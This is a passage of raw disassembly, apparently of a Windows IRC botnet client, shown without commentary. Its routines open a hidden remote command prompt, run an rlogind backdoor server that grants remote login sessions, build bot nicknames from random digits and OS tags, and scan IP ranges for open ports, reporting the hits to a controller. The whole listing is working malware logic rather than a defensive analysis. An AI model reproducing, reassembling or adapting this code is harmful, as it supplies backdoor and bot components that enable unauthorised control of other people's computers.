jmp loc_40DF70
; ---------------------------------------------------------------------------
loc_40DE30: ; CODE XREF: sub_40DDC6+60�j
push esi
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
call edi
test eax, eax
jz short loc_40DE28
mov edi, ds:dword_41F0B4
push 3
push esi
push esi
push offset dword_479BC0
call edi
push eax
push [ebp+var_8]
call edi
push eax
call ds:dword_41F0E8
test eax, eax
jz short loc_40DE28
xor eax, eax
lea edi, [ebp+var_2C]
stosd
stosd
stosd
push 11h
pop ecx
stosd
xor eax, eax
lea edi, [ebp+var_74]
rep stosd
mov eax, [ebp+var_4]
mov [ebp+var_3C], eax
mov eax, [ebp+var_C]
mov [ebp+var_38], eax
mov [ebp+var_34], eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_74]
push eax
push esi
push esi
push esi
push ebx
push esi
push esi
mov ebx, 41FA76h
push ebx
lea eax, [ebp+var_178]
push eax
mov [ebp+var_74], 44h
mov [ebp+var_48], 101h
mov [ebp+var_44], si
call ds:dword_41F030
test eax, eax
jz loc_40DE28
push [ebp+var_4]
mov edi, ds:dword_41F034
call edi
mov eax, [ebp+var_10]
push [ebp+var_28]
mov dword_479BCC, eax
mov eax, [ebp+var_8]
mov dword_479BC8, eax
mov eax, [ebp+var_2C]
mov dword_479C04, eax
call edi
cmp [ebp+arg_4], esi
mov eax, [ebp+arg_0]
mov dword_479BC4, eax
jz short loc_40DEFC
push [ebp+arg_4]
jmp short loc_40DEFD
; ---------------------------------------------------------------------------
loc_40DEFC: ; CODE XREF: sub_40DDC6+12F�j
push ebx
loc_40DEFD: ; CODE XREF: sub_40DDC6+134�j
push offset dword_479BD0
call sub_412BB5
pop ecx
pop ecx
push esi
push 8
push offset aCmdRemoteComma ; "[CMD]: Remote Command Prompt"
call sub_410EEA
mov ecx, [ebp+var_24]
mov edi, eax
imul edi, 234h
add esp, 0Ch
mov dword_434340[edi], ecx
lea ecx, [ebp+var_30]
push ecx
push esi
push eax
push offset sub_40DC39
push esi
push esi
call ds:dword_41F00C
cmp eax, esi
mov dword_43434C[edi], eax
jnz short loc_40DF6E
call ds:dword_41F008
push eax
lea eax, [ebp+var_378]
push offset aCmdFailedToSta ; "[CMD]: Failed to start IO thread, error"...
push eax
call sub_412BB5
lea eax, [ebp+var_378]
push eax
call sub_401C33
add esp, 10h
loc_40DF6E: ; CODE XREF: sub_40DDC6+17F�j
xor eax, eax
loc_40DF70: ; CODE XREF: sub_40DDC6+65�j
pop edi
pop ebx
loc_40DF72: ; CODE XREF: sub_40DDC6+32�j
pop esi
leave
retn
sub_40DDC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DF75 proc near ; CODE XREF: sub_40E00D+A6�p
; sub_40E00D+B6�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
mov esi, eax
loc_40DF7C: ; CODE XREF: sub_40DF75+2A�j
push 0
push 1
lea eax, [ebp+var_1]
push eax
push [ebp+arg_0]
call dword_433414
cmp eax, 1
jnz short loc_40DFB2
mov al, [ebp+var_1]
mov [esi], al
inc esi
dec [ebp+arg_4]
jz short loc_40DFA7
test al, al
jnz short loc_40DF7C
xor eax, eax
inc eax
loc_40DFA4: ; CODE XREF: sub_40DF75+3F�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_40DFA7: ; CODE XREF: sub_40DF75+26�j
push offset aRlogindProtoco ; "[RLOGIND]: Protocol string too long."
call sub_401CA7
pop ecx
loc_40DFB2: ; CODE XREF: sub_40DF75+1B�j
xor eax, eax
jmp short loc_40DFA4
sub_40DF75 endp
; =============== S U B R O U T I N E =======================================
sub_40DFB6 proc near ; DATA XREF: sub_40E219+5A�o
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
setz al
retn
sub_40DFB6 endp
; =============== S U B R O U T I N E =======================================
sub_40DFC0 proc near ; CODE XREF: sub_40E00D+175�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_40DFC5: ; CODE XREF: sub_40DFC0+21�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_40DFE7
test cl, cl
jz short loc_40DFE3
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_40DFE7
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40DFC5
loc_40DFE3: ; CODE XREF: sub_40DFC0+F�j
xor eax, eax
jmp short loc_40DFEC
; ---------------------------------------------------------------------------
loc_40DFE7: ; CODE XREF: sub_40DFC0+B�j
; sub_40DFC0+19�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40DFEC: ; CODE XREF: sub_40DFC0+25�j
test eax, eax
pop esi
jz short loc_40E009
push [esp+arg_4]
push [esp+4+arg_0]
push offset aRlogindLoginRe ; "[RLOGIND]: Login rejected, Remote user:"...
call sub_401CA7
add esp, 0Ch
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40E009: ; CODE XREF: sub_40DFC0+2F�j
xor eax, eax
inc eax
retn
sub_40DFC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40E00D proc near ; DATA XREF: sub_40E219+19F�o
var_3D4 = byte ptr -3D4h
var_350 = byte ptr -350h
var_208 = dword ptr -208h
var_1F4 = dword ptr -1F4h
var_1F0 = dword ptr -1F0h
var_F0 = byte ptr -0F0h
var_B0 = byte ptr -0B0h
var_4C = byte ptr -4Ch
var_3C = byte ptr -3Ch
var_2C = byte ptr -2Ch
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 3D4h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_3D4]
rep movsd
mov esi, [ebp+74h+var_208]
mov [ebp+74h+arg_0], esi
imul esi, 234h
xor edi, edi
inc edi
mov [eax+1DCh], edi
mov eax, dword_434344[esi]
mov [ebp+74h+var_1F0], eax
xor ebx, ebx
lea eax, [ebp+74h+var_C]
push eax
push ebx
push ebx
lea eax, [ebp+74h+var_1F4]
push eax
push ebx
mov [ebp+74h+var_C], 1Eh
mov [ebp+74h+var_8], ebx
mov [ebp+74h+var_1F4], edi
call dword_433544
test eax, eax
jnz short loc_40E096
push dword_434344[esi]
call dword_4335AC
push [ebp+74h+var_208]
loc_40E08B: ; CODE XREF: sub_40E00D+1A2�j
call sub_4111AE
pop ecx
jmp loc_40E211
; ---------------------------------------------------------------------------
loc_40E096: ; CODE XREF: sub_40E00D+6A�j
push ebx
push edi
lea eax, [ebp+74h+var_3C]
push eax
push dword_434344[esi]
call dword_433414
push 10h
push dword_434344[esi]
lea eax, [ebp+74h+var_2C]
call sub_40DF75
push 10h
push dword_434344[esi]
lea eax, [ebp+74h+var_4C]
call sub_40DF75
push 40h
push dword_434344[esi]
lea eax, [ebp+74h+var_F0]
call sub_40DF75
add esp, 18h
lea eax, [ebp+74h+var_4]
push eax
lea eax, [ebp+74h+var_1C]
push eax
push dword_434344[esi]
mov [ebp+74h+var_4], 10h
call dword_4334E0
test eax, eax
jz short loc_40E11E
call dword_433558
push eax
push offset aRlogindErrorGe ; "[RLOGIND]: Error: getpeername(): <%d>."
call sub_401CA7
push [ebp+74h+var_208]
call sub_4111AE
add esp, 0Ch
jmp loc_40E211
; ---------------------------------------------------------------------------
loc_40E11E: ; CODE XREF: sub_40E00D+EB�j
push 2
push 4
lea eax, [ebp+74h+var_18]
push eax
call dword_433590
cmp eax, ebx
jnz short loc_40E147
push [ebp+74h+var_18]
call dword_433520
push eax
lea eax, [ebp+74h+var_B0]
push eax
call sub_412BB5
pop ecx
pop ecx
jmp short loc_40E156
; ---------------------------------------------------------------------------
loc_40E147: ; CODE XREF: sub_40E00D+121�j
mov ecx, [eax]
lea edx, [ebp+74h+var_B0]
loc_40E14C: ; CODE XREF: sub_40E00D+147�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
cmp al, bl
jnz short loc_40E14C
loc_40E156: ; CODE XREF: sub_40E00D+138�j
push ebx
push edi
push 41FA76h
push dword_434344[esi]
call dword_433534
cmp dword_479C0C, ebx
jnz short loc_40E1B4
push [ebp+74h+var_18]
lea eax, [ebp+74h+var_B0]
push eax
lea eax, [ebp+74h+var_2C]
push eax
lea eax, [ebp+74h+var_350]
call sub_40DFC0
add esp, 0Ch
test eax, eax
jnz short loc_40E1B4
push ebx
push 13h
push offset aPermissionDeni ; "Permission denied\n"
lea esi, dword_434344[esi]
push dword ptr [esi]
call dword_433534
push dword ptr [esi]
call dword_4335AC
push [ebp+74h+arg_0]
jmp loc_40E08B
; ---------------------------------------------------------------------------
loc_40E1B4: ; CODE XREF: sub_40E00D+162�j
; sub_40E00D+17F�j
lea eax, [ebp+74h+var_B0]
push eax
lea eax, [ebp+74h+var_2C]
push eax
push offset aRlogindUserLog ; "[RLOGIND]: User logged in: <%s@%s>."
call sub_401CA7
push [ebp+74h+arg_0]
call sub_40F3F5
add esp, 10h
test eax, eax
jnz short loc_40E1F4
call ds:dword_41F008
push eax
push offset aRlogindErrorSe ; "[RLOGIND]: Error: SessionRun(): <%d>."
call sub_401CA7
push [ebp+74h+arg_0]
call sub_4111AE
add esp, 0Ch
push edi
jmp short loc_40E212
; ---------------------------------------------------------------------------
loc_40E1F4: ; CODE XREF: sub_40E00D+1C6�j
lea eax, [ebp+74h+var_B0]
push eax
lea eax, [ebp+74h+var_2C]
push eax
push offset aRlogindUserL_0 ; "[RLOGIND]: User logged out: <%s@%s>."
call sub_401CA7
push [ebp+74h+arg_0]
call sub_4111AE
add esp, 10h
loc_40E211: ; CODE XREF: sub_40E00D+84�j
; sub_40E00D+10C�j
push ebx
loc_40E212: ; CODE XREF: sub_40E00D+1E5�j
call ds:dword_41F014
int 3 ; Trap to Debugger
sub_40E00D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E219 proc near ; DATA XREF: sub_4078FA+40DB�o
var_5A8 = byte ptr -5A8h
var_418 = byte ptr -418h
var_218 = dword ptr -218h
var_214 = byte ptr -214h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5A8h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+var_218]
rep movsd
xor esi, esi
inc esi
mov [eax+1DCh], esi
lea eax, [ebp+var_5A8]
push eax
push 202h
call dword_4334B0
xor ebx, ebx
cmp eax, ebx
jz short loc_40E272
push eax
push offset aRlogindErrorWs ; "[RLOGIND]: Error: WSAStartup(): <%d>."
call sub_401CA7
push [ebp+var_50]
call sub_4111AE
add esp, 0Ch
loc_40E26C: ; CODE XREF: sub_40E219+8B�j
push esi
jmp loc_40E48E
; ---------------------------------------------------------------------------
loc_40E272: ; CODE XREF: sub_40E219+3B�j
push esi
push offset sub_40DFB6
call ds:dword_41F0F0
test eax, eax
jnz short loc_40E2A6
call ds:dword_41F008
push eax
push offset aRlogindFaile_0 ; "[RLOGIND]: Failed to install control-C "...
call sub_401CA7
pop ecx
pop ecx
call dword_4335B8
push [ebp+var_50]
call sub_4111AE
pop ecx
jmp short loc_40E26C
; ---------------------------------------------------------------------------
loc_40E2A6: ; CODE XREF: sub_40E219+67�j
push [ebp+var_54]
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
mov [ebp+var_24], 2
call dword_4335EC
push 6
push esi
push 2
mov [ebp+var_22], ax
mov [ebp+var_20], ebx
call dword_4334A0
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_40E41E
mov ecx, [ebp+var_50]
imul ecx, 234h
push 10h
pop edi
mov dword_434344[ecx], eax
push edi
lea ecx, [ebp+var_24]
push ecx
push eax
call dword_433578
test eax, eax
jnz loc_40E41E
push 7FFFFFFFh
push [ebp+arg_0]
call dword_4335C0
test eax, eax
jnz loc_40E41E
push offset aRlogindReadyAn ; "[RLOGIND]: Ready and waiting for incomi"...
mov [ebp+var_14], 0Ch
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
call sub_401C33
pop ecx
mov [ebp+var_8], esi
jmp loc_40E3FD
; ---------------------------------------------------------------------------
loc_40E338: ; CODE XREF: sub_40E219+1FD�j
push [ebp+var_8]
lea eax, [ebp+var_8]
push eax
push 8
push 0FFFFh
push esi
call dword_4334BC
cmp eax, 0FFFFFFFFh
jz loc_40E3FD
push [ebp+var_50]
movzx eax, [ebp+var_32]
push eax
push [ebp+var_30]
mov [ebp+var_3C], ebx
call dword_433520
push eax
lea eax, [ebp+var_418]
push offset aRlogindClientC ; "[RLOGIND]: Client connection from IP: %"...
push eax
call sub_412BB5
lea eax, [ebp+var_418]
push eax
call sub_401C33
push esi
lea eax, [ebp+var_418]
push 7
push eax
call sub_410EEA
mov ecx, [ebp+var_50]
mov [ebp+var_4C], eax
imul eax, 234h
add esp, 24h
mov dword_43433C[eax], ecx
lea eax, [ebp+var_38]
push eax
push ebx
lea eax, [ebp+var_218]
push eax
push offset sub_40E00D
push ebx
lea eax, [ebp+var_14]
push eax
call ds:dword_41F00C
mov ecx, [ebp+var_4C]
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ecx], eax
jnz short loc_40E3F8
call ds:dword_41F008
push eax
push offset aRlogindFaile_1 ; "[RLOGIND]: Failed to start client threa"...
call sub_401CA7
pop ecx
pop ecx
jmp short loc_40E421
; ---------------------------------------------------------------------------
loc_40E3F0: ; CODE XREF: sub_40E219+1E2�j
push 32h
call ds:dword_41F000
loc_40E3F8: ; CODE XREF: sub_40E219+1C0�j
cmp [ebp+var_3C], ebx
jz short loc_40E3F0
loc_40E3FD: ; CODE XREF: sub_40E219+11A�j
; sub_40E219+137�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_34]
push eax
push [ebp+arg_0]
mov [ebp+var_4], edi
call dword_433464
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz loc_40E338
jmp short loc_40E421
; ---------------------------------------------------------------------------
loc_40E41E: ; CODE XREF: sub_40E219+BD�j
; sub_40E219+E3�j ...
mov esi, [ebp+arg_0]
loc_40E421: ; CODE XREF: sub_40E219+1D5�j
; sub_40E219+203�j
call dword_433558
push eax
lea eax, [ebp+var_418]
push offset aRlogindError_0 ; "[RLOGIND]: Error: server failed, return"...
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_40], ebx
jnz short loc_40E461
push ebx
push [ebp+var_44]
lea eax, [ebp+var_418]
push eax
lea eax, [ebp+var_214]
push eax
push [ebp+var_218]
call sub_4045DD
add esp, 14h
loc_40E461: ; CODE XREF: sub_40E219+226�j
lea eax, [ebp+var_418]
push eax
call sub_401C33
pop ecx
push esi
call dword_4335AC
push [ebp+arg_0]
call dword_4335AC
call dword_4335B8
push [ebp+var_50]
call sub_4111AE
pop ecx
push ebx
loc_40E48E: ; CODE XREF: sub_40E219+54�j
call ds:dword_41F014
int 3 ; Trap to Debugger
sub_40E219 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40E495 proc near ; CODE XREF: sub_40E7B0+6C�p
; DATA XREF: .data:off_42B298�o
var_C = dword ptr -0Ch
arg_0 = dword ptr 4
push esi
push edi
call ds:dword_41F004
push eax
call sub_412D64
mov edi, [esp+0Ch+arg_0]
mov [esp+0Ch+var_C], offset aSoul ; "[SOUL]"
push offset aS_1 ; "%s"
push 1Ch
push edi
call sub_412E0D
xor esi, esi
add esp, 10h
cmp dword_42AE60, esi
jle short loc_40E4EE
loc_40E4C8: ; CODE XREF: sub_40E495+57�j
call sub_412D71
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_412E0D
add esp, 14h
inc esi
cmp esi, dword_42AE60
jl short loc_40E4C8
loc_40E4EE: ; CODE XREF: sub_40E495+31�j
mov eax, edi
pop edi
pop esi
retn
sub_40E495 endp
; =============== S U B R O U T I N E =======================================
sub_40E4F3 proc near ; CODE XREF: sub_4078FA+2C3B�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
call ds:dword_41F004
push eax
call sub_412D64
pop ecx
call sub_412D71
push 3
cdq
pop ecx
idiv ecx
mov ebx, [esp+0Ch+arg_0]
xor edi, edi
mov esi, edx
add esi, dword_42AE60
test esi, esi
jle short loc_40E536
loc_40E520: ; CODE XREF: sub_40E4F3+41�j
call sub_412D71
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_40E520
loc_40E536: ; CODE XREF: sub_40E4F3+2B�j
and byte ptr [edi+ebx], 0
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_40E4F3 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov dword ptr [ebp-4], 100h
call ds:dword_41F004
push eax
call sub_412D64
pop ecx
lea eax, [ebp-4]
push eax
mov esi, offset aPc ; "PC"
push esi
call ds:dword_41F0B0
mov edi, [ebp+8]
push esi
push 1Ch
push edi
call sub_412E0D
xor esi, esi
add esp, 0Ch
cmp dword_42AE60, esi
jle short loc_40E5A9
loc_40E583: ; CODE XREF: .text:0040E5A7�j
call sub_412D71
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_412E0D
add esp, 14h
inc esi
cmp esi, dword_42AE60
jl short loc_40E583
loc_40E5A9: ; CODE XREF: .text:0040E581�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
call ds:dword_41F004
push eax
call sub_412D64
pop ecx
push 0Ah
lea eax, [ebp-0Ch]
push eax
push 7
push 800h
call ds:dword_41F0F4
mov edi, [ebp+8]
lea eax, [ebp-0Ch]
push eax
push offset aS_1 ; "%s"
push 1Ch
push edi
call sub_412E0D
xor esi, esi
add esp, 10h
cmp dword_42AE60, esi
jle short loc_40E61E
loc_40E5F8: ; CODE XREF: .text:0040E61C�j
call sub_412D71
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_412E0D
add esp, 14h
inc esi
cmp esi, dword_42AE60
jl short loc_40E5F8
loc_40E61E: ; CODE XREF: .text:0040E5F6�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
lea ebp, [esp-74h]
sub esp, 94h
push esi
push edi
lea eax, [ebp-20h]
push eax
mov esi, 41FA76h
mov dword ptr [ebp-20h], 94h
call ds:dword_41F0F8
call ds:dword_41F004
push eax
call sub_412D64
cmp dword ptr [ebp-1Ch], 4
pop ecx
jnz short loc_40E692
cmp dword ptr [ebp-18h], 0
jnz short loc_40E678
cmp dword ptr [ebp-10h], 1
jnz short loc_40E66B
mov esi, offset a95 ; "95"
loc_40E66B: ; CODE XREF: .text:0040E664�j
cmp dword ptr [ebp-10h], 2
jnz short loc_40E6C2
mov esi, offset aNt ; "NT"
jmp short loc_40E6C2
; ---------------------------------------------------------------------------
loc_40E678: ; CODE XREF: .text:0040E65E�j
cmp dword ptr [ebp-18h], 0Ah
jnz short loc_40E685
mov esi, offset a98 ; "98"
jmp short loc_40E6C2
; ---------------------------------------------------------------------------
loc_40E685: ; CODE XREF: .text:0040E67C�j
cmp dword ptr [ebp-18h], 5Ah
jnz short loc_40E6BD
mov esi, offset aMe_0 ; "ME"
jmp short loc_40E6C2
; ---------------------------------------------------------------------------
loc_40E692: ; CODE XREF: .text:0040E658�j
cmp dword ptr [ebp-1Ch], 5
jnz short loc_40E6BD
cmp dword ptr [ebp-18h], 0
jnz short loc_40E6A5
mov esi, offset a2k ; "2K"
jmp short loc_40E6C2
; ---------------------------------------------------------------------------
loc_40E6A5: ; CODE XREF: .text:0040E69C�j
cmp dword ptr [ebp-18h], 1
jnz short loc_40E6B2
mov esi, offset aXp_0 ; "XP"
jmp short loc_40E6C2
; ---------------------------------------------------------------------------
loc_40E6B2: ; CODE XREF: .text:0040E6A9�j
cmp dword ptr [ebp-18h], 2
mov esi, offset a2k3 ; "2K3"
jz short loc_40E6C2
loc_40E6BD: ; CODE XREF: .text:0040E689�j
; .text:0040E696�j
mov esi, offset a??? ; "???"
loc_40E6C2: ; CODE XREF: .text:0040E66F�j
; .text:0040E676�j ...
mov edi, [ebp+7Ch]
push esi
push offset aS_5 ; "[%s]"
push 1Ch
push edi
call sub_412E0D
xor esi, esi
add esp, 10h
cmp dword_42AE60, esi
jle short loc_40E706
loc_40E6E0: ; CODE XREF: .text:0040E704�j
call sub_412D71
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_412E0D
add esp, 14h
inc esi
cmp esi, dword_42AE60
jl short loc_40E6E0
loc_40E706: ; CODE XREF: .text:0040E6DE�j
mov eax, edi
pop edi
pop esi
add ebp, 74h
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E70F proc near ; CODE XREF: sub_40E7B0+80�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call ds:dword_41F004
xor edx, edx
mov ecx, 5265C00h
div ecx
push 0
push offset aMirc_0 ; "mIRC"
mov esi, eax
call dword_4334F8
test esi, esi
jbe short loc_40E75D
test eax, eax
mov eax, offset aM_0 ; "[M]"
jnz short loc_40E746
mov eax, 41FA76h
loc_40E746: ; CODE XREF: sub_40E70F+30�j
push eax
push esi
push offset aDS ; "[%d]%s"
lea eax, [ebp+var_1C]
push 1Ch
push eax
call sub_412E0D
add esp, 14h
jmp short loc_40E777
; ---------------------------------------------------------------------------
loc_40E75D: ; CODE XREF: sub_40E70F+27�j
test eax, eax
mov eax, offset aM_0 ; "[M]"
jnz short loc_40E76B
mov eax, 41FA76h
loc_40E76B: ; CODE XREF: sub_40E70F+55�j
push eax
lea eax, [ebp+var_1C]
push eax
call sub_412BB5
pop ecx
pop ecx
loc_40E777: ; CODE XREF: sub_40E70F+4C�j
lea eax, [ebp+var_1C]
lea edx, [eax+1]
pop esi
loc_40E77E: ; CODE XREF: sub_40E70F+74�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40E77E
sub eax, edx
cmp eax, 2
jbe short loc_40E7AB
push 1Ch
push [ebp+arg_0]
lea eax, [ebp+var_1C]
push eax
call sub_412A80
push 1Ch
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_0]
call sub_412C40
add esp, 18h
loc_40E7AB: ; CODE XREF: sub_40E70F+7B�j
mov eax, [ebp+arg_0]
leave
retn
sub_40E70F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E7B0 proc near ; CODE XREF: sub_40751F+53�p
; sub_40779B+45�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
xor edx, edx
xor edi, edi
loc_40E7BA: ; CODE XREF: sub_40E7B0+62�j
mov esi, [ebp+arg_C]
test esi, esi
jz short loc_40E7F9
lea eax, dword_42B288[edi]
loc_40E7C7: ; CODE XREF: sub_40E7B0+33�j
mov bl, [esi]
mov cl, bl
cmp bl, [eax]
jnz short loc_40E7E9
test cl, cl
jz short loc_40E7E5
mov bl, [esi+1]
mov cl, bl
cmp bl, [eax+1]
jnz short loc_40E7E9
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_40E7C7
loc_40E7E5: ; CODE XREF: sub_40E7B0+21�j
xor eax, eax
jmp short loc_40E7EE
; ---------------------------------------------------------------------------
loc_40E7E9: ; CODE XREF: sub_40E7B0+1D�j
; sub_40E7B0+2B�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40E7EE: ; CODE XREF: sub_40E7B0+37�j
xor ecx, ecx
test eax, eax
setz cl
mov eax, ecx
jmp short loc_40E807
; ---------------------------------------------------------------------------
loc_40E7F9: ; CODE XREF: sub_40E7B0+F�j
mov ecx, dword_42B294[edi]
xor eax, eax
cmp ecx, [ebp+arg_4]
setz al
loc_40E807: ; CODE XREF: sub_40E7B0+47�j
test eax, eax
jnz short loc_40E816
add edi, 14h
inc edx
cmp edi, 64h
jb short loc_40E7BA
jmp short loc_40E824
; ---------------------------------------------------------------------------
loc_40E816: ; CODE XREF: sub_40E7B0+59�j
push [ebp+arg_0]
lea eax, [edx+edx*4]
call off_42B298[eax*4]
pop ecx
loc_40E824: ; CODE XREF: sub_40E7B0+64�j
cmp [ebp+arg_8], 0
pop edi
pop esi
pop ebx
jz short loc_40E838
push [ebp+arg_0]
call sub_40E70F
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40E838: ; CODE XREF: sub_40E7B0+7B�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_40E7B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40E83D proc near ; DATA XREF: sub_40E8FF+77�o
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0B8h
mov eax, [ebp+74h+arg_0]
push esi
push edi
mov esi, eax
push 2Ah
pop ecx
lea edi, [ebp+74h+var_B8]
rep movsd
push [ebp+74h+var_34]
xor esi, esi
inc esi
mov [eax+0A4h], esi
xor eax, eax
lea edi, [ebp+74h+var_10]
stosd
stosd
stosd
stosd
mov [ebp+74h+var_10], 2
call dword_4335EC
push 6
mov [ebp+74h+var_E], ax
mov eax, [ebp+74h+var_28]
push esi
push 2
mov [ebp+74h+var_C], eax
call dword_4334A0
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40E8ED
push 10h
lea eax, [ebp+74h+var_10]
push eax
push esi
call dword_433458
mov ecx, [ebp+74h+var_2C]
imul ecx, 234h
cmp eax, 0FFFFFFFFh
mov dword_434344[ecx], esi
jz short loc_40E8ED
push [ebp+74h+var_34]
push [ebp+74h+var_28]
call dword_433520
push eax
push offset aScanIpSPortD_0 ; "[SCAN]: IP: %s Port: %d is open."
mov edi, offset dword_479C18
push edi
call sub_412BB5
push 0
push [ebp+74h+var_20]
lea eax, [ebp+74h+var_B4]
push edi
push eax
push [ebp+74h+var_B8]
call sub_4045DD
push edi
call sub_401C33
add esp, 28h
loc_40E8ED: ; CODE XREF: sub_40E83D+55�j
; sub_40E83D+76�j
push esi
call dword_4335AC
pop edi
xor eax, eax
pop esi
add ebp, 74h
leave
retn 4
sub_40E83D endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame fpd=74h
sub_40E8FF proc near ; DATA XREF: sub_4078FA+25BA�o
var_12C = byte ptr -12Ch
var_AC = byte ptr -0ACh
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 12Ch
push ebx
mov ebx, [ebp+74h+arg_0]
push esi
push edi
push 2Ah
pop ecx
mov esi, ebx
lea edi, [ebp+74h+var_AC]
rep movsd
mov esi, ds:dword_41F000
mov dword ptr [ebx+0A0h], 1
xor edi, edi
loc_40E92C: ; CODE XREF: sub_40E8FF+C1�j
push [ebp+74h+var_28]
push [ebp+74h+var_1C]
call dword_433520
push eax
lea eax, [ebp+74h+var_12C]
push offset aScanScanningIp ; "[SCAN]: Scanning IP: %s, Port: %d."
push eax
call sub_412BB5
push 1FFh
lea eax, [ebp+74h+var_12C]
push eax
mov eax, [ebp+74h+var_20]
imul eax, 234h
add eax, offset dword_434138
push eax
call sub_412C40
add esp, 1Ch
lea eax, [ebp+74h+var_4]
push eax
push edi
lea eax, [ebp+74h+var_AC]
push eax
push offset sub_40E83D
push edi
push edi
call ds:dword_41F00C
cmp eax, edi
mov [ebp+74h+arg_0], eax
jz short loc_40E995
jmp short loc_40E990
; ---------------------------------------------------------------------------
loc_40E98C: ; CODE XREF: sub_40E8FF+94�j
push 32h
call esi
loc_40E990: ; CODE XREF: sub_40E8FF+8B�j
cmp [ebp+74h+var_8], edi
jz short loc_40E98C
loc_40E995: ; CODE XREF: sub_40E8FF+89�j
push [ebp+74h+arg_0]
call ds:dword_41F034
push dword ptr [ebx+88h]
mov [ebx+0A4h], edi
call esi
push [ebp+74h+var_1C]
call dword_433570
inc eax
push eax
call dword_4335C4
mov [ebp+74h+var_1C], eax
jmp loc_40E92C
sub_40E8FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E9C5 proc near ; CODE XREF: sub_40F005+8�p
; sub_40F023+37�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
